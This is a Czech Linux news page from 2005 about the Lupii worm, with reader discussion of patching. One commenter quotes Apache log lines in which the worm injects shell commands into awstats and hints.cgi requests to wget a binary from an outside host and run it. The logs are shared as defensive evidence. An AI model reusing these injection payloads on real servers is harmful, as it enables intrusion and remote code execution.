abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
    dnes 04:00 | Zajímavý článek

    Farid Abdelnour se v příspěvku na blogu rozepsal o novinkám v nejnovější verzi 25.08.0 editoru videa Kdenlive (Wikipedie). Ke stažení také na Flathubu.

    Ladislav Hagara | Komentářů: 0
    dnes 01:55 | Nová verze

    Byla vydána nová verze 2.51.0 distribuovaného systému správy verzí Git. Přispělo 91 vývojářů, z toho 21 nových. Přehled novinek v příspěvku na blogu GitHubu a v poznámkách k vydání.

    Ladislav Hagara | Komentářů: 0
    dnes 01:33 | Zajímavý článek

    Po roce bylo vydáno nové číslo magazínu Phrack: Phrack 72.

    Ladislav Hagara | Komentářů: 0
    včera 19:33 | Pozvánky

    OpenSSL Corporation zve na den otevřených dveří ve středu 20. srpna v Brně a konferenci OpenSSL od 7. do 9. října v Praze.

    Ladislav Hagara | Komentářů: 1
    včera 19:22 | Komunita

    Konference LinuxDays 2025 proběhne o víkendu 4. a 5. října v Praze. Konference OpenAlt 2025 o víkendu 1. a 2. listopadu v Brně. Blíží se konec přihlašování přednášek. Přihlaste svou přednášku (LinuxDays do 31. srpna a OpenAlt do 3. října) nebo doporučte konference známým.

    Ladislav Hagara | Komentářů: 0
    včera 12:22 | IT novinky

    Raspberry Pi Touch Display 2 je nově vedle 7palcové k dispozici také v 5palcové variantě. Rozlišení stejné 720 × 1280 pixelů. Cena 40 dolarů.

    Ladislav Hagara | Komentářů: 1
    včera 04:44 | IT novinky

    Telnet a ssh klient PuTTY postupně přechází na novou doménu putty.software.

    Ladislav Hagara | Komentářů: 5
    16.8. 01:00 | Komunita

    Debian dnes slaví 32 let. Ian Murdock oznámil vydání "Debian Linux Release" 16. srpna 1993.

    Ladislav Hagara | Komentářů: 17
    15.8. 17:44 | IT novinky

    Policisté zadrželi odsouzeného drogového dealera Tomáše Jiřikovského, který daroval ministerstvu spravedlnosti za tehdejšího ministra Pavla Blažka (ODS) bitcoiny v miliardové hodnotě, a zajistili i darovanou kryproměnu. Zadržení Jiřikovského může být podle ministerstva důležité k rozuzlení kauzy, která vypukla koncem května a vedla ke konci Blažka. Zajištění daru podle úřadu potvrzuje závěry dříve publikovaných právních

    … více »
    Ladislav Hagara | Komentářů: 11
    15.8. 13:44 | IT novinky

    Administrativa amerického prezidenta Donalda Trumpa jedná o možném převzetí podílu ve výrobci čipů Intel. Agentuře Bloomberg to řekly zdroje obeznámené se situací. Akcie Intelu v reakci na tuto zprávu výrazně posílily. Trump minulý týden označil Tana za konfliktní osobu, a to kvůli jeho vazbám na čínské společnosti, čímž vyvolal nejistotu ohledně dlouholetého úsilí Intelu o obrat v hospodaření. Po pondělní schůzce však prezident o šéfovi Intelu hovořil příznivě.

    Ladislav Hagara | Komentářů: 5
    Pro otevření více webových stránek ve webovém prohlížečí používám
     (73%)
     (9%)
     (9%)
     (0%)
     (9%)
     (0%)
    Celkem 11 hlasů
     Komentářů: 0
    Rozcestník

    Blíží se doba linuxových červů

    Luppi Worm je očividná cesta s ohromnými možnostmi pro útočníky. V příštích měsicích se tak možná přesvědčíme, jak bezpečné vlastně ve skutečnosti linuxové systém jsou. Více na eWeeku v článku Is This the Dawn of the Linux Worms?

    10.11.2005 08:27 | Pavel 'lingeek' Szalbot | Zajímavý článek


    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    Komentáře

    Vložit další komentář

    10.11.2005 09:07 Robert Krátký | skóre: 94 | blog: Robertův bloček
    Rozbalit Rozbalit vše Re: Blíží se doba linuxových červů
    10.11.2005 13:41 lukas.ramlich | skóre: 3 | blog: linux_a_ja
    Rozbalit Rozbalit vše Re: Blíží se doba linuxových červů
    Už se těším, až někdo vypustí nějakého schopného červa. Konečně snad přejde většina webhosterů na PHP5 :)

    Hodně provozovatelů webhostingu totiž kdysi před 5 lety něco nainstalovalo a protože nechtějí "buzerovat" své zákazníky, pěkně tuto zastaralou konfiguraci udržují v chodu, nehledě na nové verze a nové bugy.

    Naposledy jsem potkal starou verzi u Active24. Nakopíruju skript, nefunguje. Podívám se na verzi PHP a co nevidím Debian Woody a PHP v4.1.2! Zastaralý Debian a 3 roky staré PHP. Ani nechci zkoumat, jestli na něj ještě vycházejí nějaké backporty bezpečnostních updatů...

    Jak to vypadá u ostatních mě snad už ani nezajímá.
    10.11.2005 15:56 Sofr
    Rozbalit Rozbalit vše Re: Blíží se doba linuxových červů
    Ja bych podle http://www.debian.org/releases/woody/, konkretne "The security team has announced that it will continue to provide security updates for Debian GNU/Linux 3.0 (woody) until May 2006 or until security support for etch (the release following sarge) starts." rekl, ze security updaty zatim vychazeji. Ale osobne tedy Woodyho nikde nemam, takze z vlastni zkusenosti to potvrdit nemohu.

    Ovsem pokud na nej updaty vychazeji, pak na pouzivani starych verzi nic spatneho nevidim a Vas odsuzujici ton se mi prilis nelibi.
    10.11.2005 16:30 #Tom
    Rozbalit Rozbalit vše Re: Blíží se doba linuxových červů
    Na používání starých, ovšem záplatovaných verzí sice nic špatného není, ale dobrého také ne. Zrovna PHP 5 by mi docela chybělo.
    10.11.2005 16:19 Ctirad Feřtr | skóre: 43 | Praha
    Rozbalit Rozbalit vše Re: Blíží se doba linuxových červů
    Mohl by někdo pár větami shrnout, čeho se vlastně tímto červem zneužitelná chyba týká a co je tedy potřeba záplatovat? Z těch pár útržků co jsem pochopil to není chyba v linuxu (jako tvrdí někde), ani v žádném webserveru (jak tvrdí někde jinde), ale v nějkém modulu pro PHP (jestli se vyjadřuju blbě, tak sorry, web ani php není moje parketa). Jelikož žádný webserver neprovozuji, tak mě to netrápí, ale chtěl bych vědět jak to vlastně je.
    11.11.2005 10:13 Milan Hejpetr | skóre: 25 | blog: poznamky | Plzen
    Rozbalit Rozbalit vše Re: Blíží se doba linuxových červů
    Viz napr. http://www.symantec.com/avcenter/venc/data/linux.plupii.html

    Jinak v logu Apache to vypada napr. takto (kraceno):
    ...
    64.76.125.141 - - [09/Nov/2005:20:00:36 +0100] "POST /xmlrpc.php HTTP/1.1" 404 286
    64.76.125.141 - - [09/Nov/2005:20:00:38 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 404 291
    64.76.125.141 - - [09/Nov/2005:20:00:39 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 298
    64.76.125.141 - - [09/Nov/2005:20:00:41 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 299
    64.76.125.141 - - [09/Nov/2005:20:00:42 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 404 293
    64.76.125.141 - - [09/Nov/2005:20:00:43 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 299
    64.76.125.141 - - [09/Nov/2005:20:00:45 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 296
    64.76.125.141 - - [09/Nov/2005:20:00:49 +0100] "POST /xmlrpc.php HTTP/1.1" 404 286
    64.76.125.141 - - [09/Nov/2005:20:00:50 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 293
    64.76.125.141 - - [09/Nov/2005:20:00:52 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 293
    ...
    Pak je zajimave jeste napr. toto :-)
    ...
    64.76.125.141 - - [09/Nov/2005:20:00:31 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3b
    chmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 294
    ...
    ...
    64.76.125.141 - - [09/Nov/2005:20:03:40 +0100] "GET /scgi-bin/hints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;
    chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 300 ...
    Luboš Doležel (Doli) avatar 10.11.2005 16:39 Luboš Doležel (Doli) | skóre: 98 | blog: Doliho blog | Kladensko
    Rozbalit Rozbalit vše Re: Blíží se doba linuxových červů
    Kdo se tímhle nechá nakazit a útočník se úspěšně zvěnčí dostane do jeho systému musí být blbec a snad si ani nezaslouží mít práci jako admin.

    Založit nové vláknoNahoru


    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.